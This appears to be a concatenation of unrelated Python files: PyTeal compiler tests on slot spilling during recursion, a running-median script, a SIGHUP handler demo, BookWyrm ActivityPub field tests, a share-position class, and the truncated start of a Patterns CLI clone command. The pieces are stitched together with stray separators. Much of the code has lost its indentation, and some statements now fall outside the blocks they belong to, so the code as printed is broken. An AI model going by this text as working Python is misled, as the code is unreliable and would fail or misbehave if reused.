TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.pop),
TealOp(None, Op.pop),
TealOp(None, Op.pop),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_no_return_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.none)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_return_v4():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 0),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_return_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.cover, 3),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_more_args_than_slots_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.cover, 3),
TealOp(None, Op.load, 1),
TealOp(None, Op.cover, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.cover, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_more_slots_than_args_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 10),
TealOp(None, Op.store, 3),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2, 3}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 10),
TealOp(None, Op.store, 3),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.load, 3),
TealOp(None, Op.uncover, 6),
TealOp(None, Op.uncover, 6),
TealOp(None, Op.uncover, 6),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.cover, 4),
TealOp(None, Op.store, 3),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_with_scratchvar():
# modifying test_spillLocalSlotsDuringRecursion_multiple_subroutines_no_recursion()
# to be recursive and fail due to by-ref args
def sub1Impl(a1):
return None
def sub2Impl(a1, a2: ScratchVar):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine2},
subroutine2: {subroutine1},
subroutine3: set(),
}
    localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: set()}
with pytest.raises(TealInputError) as tie:
spillLocalSlotsDuringRecursion(
5, subroutineMapping, subroutineGraph, localSlots
)
assert (
"ScratchVar arguments not allowed in recursive subroutines, but a recursive call-path was detected: sub2Impl()-->sub1Impl()-->sub2Impl()"
in str(tie)
)
def test_resolveSubroutines():
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
expected = OrderedDict()
expected[subroutine1] = "sub1Impl_0"
expected[subroutine2] = "sub2Impl_1"
expected[subroutine3] = "sub3Impl_2"
actual = resolveSubroutines(subroutineMapping)
assert actual == expected
assert mainOps == [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, expected[subroutine1]),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, expected[subroutine2]),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, expected[subroutine3]),
]
assert subroutine1Ops == [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, expected[subroutine1]),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
assert subroutine2Ops == [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, expected[subroutine1]),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
assert subroutine3Ops == [
TealOp(None, Op.callsub, expected[subroutine3]),
TealOp(None, Op.retsub),
]
| python |
#!/usr/bin/env python3
def opDeterminer(ops):
    vals = []
    for op in ops:
        if op[0] == 'r':
            (vals, success) = removeOp(vals, int(op[1]))
            if not success:
                print('Wrong!')
                continue
        elif op[0] == 'a':
            (vals, success) = addOp(vals, int(op[1]))
        median(vals)
def removeOp(vals, toRemove):
if toRemove in vals:
vals.remove(toRemove)
return (vals, True)
else:
return (vals, False)
def addOp(vals, toAdd):
newVals = []
success = False
for val in vals:
if val <= toAdd or success:
newVals.append(val)
else:
newVals.append(toAdd)
newVals.append(val)
success = True
if not success:
newVals.append(toAdd)
return (newVals, success)
def median(vals):
    size = len(vals)
    if size:
        # // keeps the indices integral under Python 3 division.
        med = 0.5 * (vals[size // 2] + vals[(size - 1) // 2])
    else:
        med = None
    if med is None:  # distinguish "no values" from a legitimate median of 0
        print('Wrong!')
    elif med.is_integer():
        print(int(med))
    else:
        print(med)
numOps = int(input())
ops = []
for i in range(numOps):
    op = input().strip().split(' ')
ops.append(op)
opDeterminer(ops) | python |
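# Illustrative session, assuming the op stream format "a N" (add N) and
# "r N" (remove N), with the running median printed after each operation.
# Given this stdin:
#   4
#   a 1
#   a 2
#   a 3
#   r 1
# the script prints: 1, 1.5, 2, 2.5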
import signal, time
STATE = 0
def state2(signum, frame):
    # Second SIGHUP: print, then restore the default handler so a third
    # SIGHUP terminates the process.
    print('state2')
    signal.signal(signal.SIGHUP, signal.SIG_DFL)
def state1(signum, frame):
    # First SIGHUP: print, then hand subsequent SIGHUPs to state2.
    print('state1')
    signal.signal(signal.SIGHUP, state2)
signal.signal(signal.SIGHUP, state1)
# STATE is never modified, so this loop idles indefinitely, keeping the
# process alive to receive SIGHUP signals (send them with `kill -HUP <pid>`).
while STATE < 10:
    time.sleep(0.01)
| python |
''' testing models '''
from io import BytesIO
from collections import namedtuple
import json
import pathlib
import re
from unittest.mock import patch
from PIL import Image
import responses
from django.core.exceptions import ValidationError
from django.core.files.base import ContentFile
from django.db import models
from django.test import TestCase
from django.utils import timezone
from bookwyrm.models import fields, User
class ActivitypubFields(TestCase):
    ''' overrides standard model fields to work with activitypub '''
def test_validate_remote_id(self):
''' should look like a url '''
self.assertIsNone(fields.validate_remote_id(
'http://www.example.com'
))
self.assertIsNone(fields.validate_remote_id(
'https://www.example.com'
))
self.assertIsNone(fields.validate_remote_id(
'http://example.com/dlfjg-23/x'
))
self.assertRaises(
ValidationError, fields.validate_remote_id,
'http:/example.com/dlfjg-23/x'
)
self.assertRaises(
ValidationError, fields.validate_remote_id,
'www.example.com/dlfjg-23/x'
)
self.assertRaises(
ValidationError, fields.validate_remote_id,
'http://www.example.com/dlfjg 23/x'
)
def test_activitypub_field_mixin(self):
''' generic mixin with super basic to and from functionality '''
instance = fields.ActivitypubFieldMixin()
self.assertEqual(instance.field_to_activity('fish'), 'fish')
self.assertEqual(instance.field_from_activity('fish'), 'fish')
self.assertFalse(instance.deduplication_field)
instance = fields.ActivitypubFieldMixin(
activitypub_wrapper='endpoints', activitypub_field='outbox'
)
self.assertEqual(
instance.field_to_activity('fish'),
{'outbox': 'fish'}
)
self.assertEqual(
instance.field_from_activity({'outbox': 'fish'}),
'fish'
)
self.assertEqual(instance.get_activitypub_field(), 'endpoints')
instance = fields.ActivitypubFieldMixin()
instance.name = 'snake_case_name'
self.assertEqual(instance.get_activitypub_field(), 'snakeCaseName')
def test_remote_id_field(self):
''' just sets some defaults on charfield '''
instance = fields.RemoteIdField()
self.assertEqual(instance.max_length, 255)
self.assertTrue(instance.deduplication_field)
with self.assertRaises(ValidationError):
instance.run_validators('http://www.example.com/dlfjg 23/x')
def test_username_field(self):
''' again, just setting defaults on username field '''
instance = fields.UsernameField()
self.assertEqual(instance.activitypub_field, 'preferredUsername')
self.assertEqual(instance.max_length, 150)
self.assertEqual(instance.unique, True)
with self.assertRaises(ValidationError):
instance.run_validators('one two')
instance.run_validators('a*&')
instance.run_validators('trailingwhite ')
self.assertIsNone(instance.run_validators('aksdhf'))
self.assertEqual(instance.field_to_activity('[email protected]'), 'test')
def test_foreign_key(self):
''' should be able to format a related model '''
instance = fields.ForeignKey('User', on_delete=models.CASCADE)
Serializable = namedtuple('Serializable', ('to_activity', 'remote_id'))
item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c')
# returns the remote_id field of the related object
self.assertEqual(instance.field_to_activity(item), 'https://e.b/c')
@responses.activate
def test_foreign_key_from_activity_str(self):
''' create a new object from a foreign key '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json')
userdata = json.loads(datafile.read_bytes())
# don't try to load the user icon
del userdata['icon']
# it shouldn't match with this unrelated user:
unrelated_user = User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
# test receiving an unknown remote id and loading data
responses.add(
responses.GET,
'https://example.com/user/mouse',
json=userdata,
status=200)
with patch('bookwyrm.models.user.set_remote_server.delay'):
value = instance.field_from_activity(
'https://example.com/user/mouse')
self.assertIsInstance(value, User)
self.assertNotEqual(value, unrelated_user)
self.assertEqual(value.remote_id, 'https://example.com/user/mouse')
self.assertEqual(value.name, 'MOUSE?? MOUSE!!')
def test_foreign_key_from_activity_dict(self):
        ''' test receiving activity json '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json')
userdata = json.loads(datafile.read_bytes())
# don't try to load the user icon
del userdata['icon']
# it shouldn't match with this unrelated user:
unrelated_user = User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
with patch('bookwyrm.models.user.set_remote_server.delay'):
value = instance.field_from_activity(userdata)
self.assertIsInstance(value, User)
self.assertNotEqual(value, unrelated_user)
self.assertEqual(value.remote_id, 'https://example.com/user/mouse')
self.assertEqual(value.name, 'MOUSE?? MOUSE!!')
# et cetera but we're not testing serializing user json
def test_foreign_key_from_activity_dict_existing(self):
''' test receiving a dict of an existing object in the db '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json'
)
userdata = json.loads(datafile.read_bytes())
user = User.objects.create_user(
'mouse', '[email protected]', 'mouseword', local=True)
user.remote_id = 'https://example.com/user/mouse'
user.save()
User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
value = instance.field_from_activity(userdata)
self.assertEqual(value, user)
def test_foreign_key_from_activity_str_existing(self):
''' test receiving a remote id of an existing object in the db '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
user = User.objects.create_user(
'mouse', '[email protected]', 'mouseword', local=True)
User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
value = instance.field_from_activity(user.remote_id)
self.assertEqual(value, user)
def test_one_to_one_field(self):
''' a gussied up foreign key '''
instance = fields.OneToOneField('User', on_delete=models.CASCADE)
Serializable = namedtuple('Serializable', ('to_activity', 'remote_id'))
item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c')
self.assertEqual(instance.field_to_activity(item), {'a': 'b'})
def test_many_to_many_field(self):
''' lists! '''
instance = fields.ManyToManyField('User')
Serializable = namedtuple('Serializable', ('to_activity', 'remote_id'))
Queryset = namedtuple('Queryset', ('all', 'instance'))
item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c')
another_item = Serializable(lambda: {}, 'example.com')
items = Queryset(lambda: [item], another_item)
self.assertEqual(instance.field_to_activity(items), ['https://e.b/c'])
instance = fields.ManyToManyField('User', link_only=True)
instance.name = 'snake_case'
self.assertEqual(
instance.field_to_activity(items),
'example.com/snake_case'
)
@responses.activate
def test_many_to_many_field_from_activity(self):
''' resolve related fields for a list, takes a list of remote ids '''
instance = fields.ManyToManyField(User)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json'
)
userdata = json.loads(datafile.read_bytes())
# don't try to load the user icon
del userdata['icon']
# test receiving an unknown remote id and loading data
responses.add(
responses.GET,
'https://example.com/user/mouse',
json=userdata,
status=200)
with patch('bookwyrm.models.user.set_remote_server.delay'):
value = instance.field_from_activity(
['https://example.com/user/mouse', 'bleh']
)
self.assertIsInstance(value, list)
self.assertEqual(len(value), 1)
self.assertIsInstance(value[0], User)
def test_tag_field(self):
''' a special type of many to many field '''
instance = fields.TagField('User')
Serializable = namedtuple(
'Serializable',
('to_activity', 'remote_id', 'name_field', 'name')
)
Queryset = namedtuple('Queryset', ('all', 'instance'))
item = Serializable(
lambda: {'a': 'b'}, 'https://e.b/c', 'name', 'Name')
another_item = Serializable(
lambda: {}, 'example.com', '', '')
items = Queryset(lambda: [item], another_item)
result = instance.field_to_activity(items)
self.assertIsInstance(result, list)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].href, 'https://e.b/c')
self.assertEqual(result[0].name, 'Name')
self.assertEqual(result[0].type, 'Serializable')
def test_tag_field_from_activity(self):
''' loadin' a list of items from Links '''
# TODO
@responses.activate
def test_image_field(self):
''' storing images '''
user = User.objects.create_user(
'mouse', '[email protected]', 'mouseword', local=True)
image_file = pathlib.Path(__file__).parent.joinpath(
'../../static/images/default_avi.jpg')
image = Image.open(image_file)
output = BytesIO()
image.save(output, format=image.format)
user.avatar.save(
'test.jpg',
ContentFile(output.getvalue())
)
output = fields.image_serializer(user.avatar)
self.assertIsNotNone(
re.match(
r'.*\.jpg',
output.url,
)
)
self.assertEqual(output.type, 'Image')
instance = fields.ImageField()
self.assertEqual(instance.field_to_activity(user.avatar), output)
responses.add(
responses.GET,
'http://www.example.com/image.jpg',
body=user.avatar.file.read(),
status=200)
loaded_image = instance.field_from_activity(
'http://www.example.com/image.jpg')
self.assertIsInstance(loaded_image, list)
self.assertIsInstance(loaded_image[1], ContentFile)
def test_datetime_field(self):
''' this one is pretty simple, it just has to use isoformat '''
instance = fields.DateTimeField()
now = timezone.now()
self.assertEqual(instance.field_to_activity(now), now.isoformat())
self.assertEqual(
instance.field_from_activity(now.isoformat()), now
)
self.assertEqual(instance.field_from_activity('bip'), None)
def test_array_field(self):
''' idk why it makes them strings but probably for a good reason '''
instance = fields.ArrayField(fields.IntegerField)
self.assertEqual(instance.field_to_activity([0, 1]), ['0', '1'])
| python |
class _Position:
def __init__(self, shares, share_price):
if share_price <= 0:
raise ValueError("Please enter a positive number for share_price")
self.shares = shares
self.position_size = float(shares * share_price)
def buy(self, shares, share_price):
if shares < 0 or share_price <= 0:
raise ValueError(" Please enter positive numbers for shares and share_price", shares, share_price)
if self.shares >= 0:
self.shares += shares
self.position_size += shares * share_price
return float('NaN')
else: # covering short position
if abs(self.shares) >= shares:
profit = (self.position_size / self.shares) * shares - share_price * shares
self.position_size += share_price * shares + profit
self.shares += shares
return profit
else:
profit = self.position_size - share_price * self.shares
self.shares += shares
self.position_size += shares * share_price + profit
return profit
def sell(self, shares, share_price):
if shares < 0 or share_price <= 0:
raise ValueError(" Please enter positive numbers for shares and share_price")
if self.shares <= 0:
self.shares -= shares
self.position_size -= shares * share_price
return float('NaN')
else: # covering long position
if self.shares >= shares:
profit = share_price * shares - (self.position_size / self.shares) * shares
self.shares -= shares
self.position_size -= shares * share_price - profit
return profit
else:
profit = share_price * self.shares - self.position_size
self.shares -= shares
self.position_size -= shares * share_price - profit
return profit
def get_shares(self):
return self.shares
def to_tuple(self):
return self.shares, self.position_size
def to_dict(self):
return {'shares': self.shares, 'position_size': self.position_size} | python |
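# A minimal usage sketch, assuming the conventions implied above: buy()/sell()
# return the realized profit when covering an opposing position and NaN when
# merely extending one.
if __name__ == '__main__':
    pos = _Position(10, 100.0)   # long 10 shares at $100
    print(pos.buy(5, 110.0))     # extends the long position -> nan
    print(pos.sell(10, 120.0))   # covers 10 of 15 long shares -> ~166.67 profit
    print(pos.to_dict())         # remaining shares and position size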
import io
import re
from pathlib import Path
from zipfile import ZipFile
import typer
from typer import Option, Argument
from patterns.cli.services.lookup import IdLookup
from patterns.cli.services.output import sprint, abort_on_error, abort
from patterns.cli.services.pull import (
download_graph_zip,
download_component_zip,
COMPONENT_RE,
)
from patterns.configuration.edit import GraphDirectoryEditor, FileOverwriteError
_graph_help = "The name of a graph in your Patterns organization [default: directory name]"
_graph_version_id_help = (
"The id of the graph version to pull. [default: latest version]"
)
_organization_help = "The name of the Patterns organization that the graph was uploaded to"
_force_help = "Overwrite existing files without prompting"
_directory_help = "The directory to create the new graph in. Must not exist."
_component_help = (
"The component version to download (e.g. 'organization/component@v1')."
)
def clone(
organization: str = Option("", "-o", "--organization", help=_organization_help),
graph: str = Option("", help=_graph_help),
graph_version_id: str = Option("", "-v", "--version", help=_graph_version_id_help),
component: str = Option("", "--component", help=_component_help),
    directory: Path = Argument(None, exists=False, help=_directory_help),
):
"""Download the code for a graph"""
if not graph and not directory and not component:
if graph_version_id:
abort(
f"Missing graph directory argument."
f"\ntry [code]patterns clone -v {graph_version_id} new_graph"
)
else:
abort(
f"Missing graph argument." f"\ntry [code]patterns clone graph-to-clone"
)
component_match = COMPONENT_RE.fullmatch(component)
if component and not component_match:
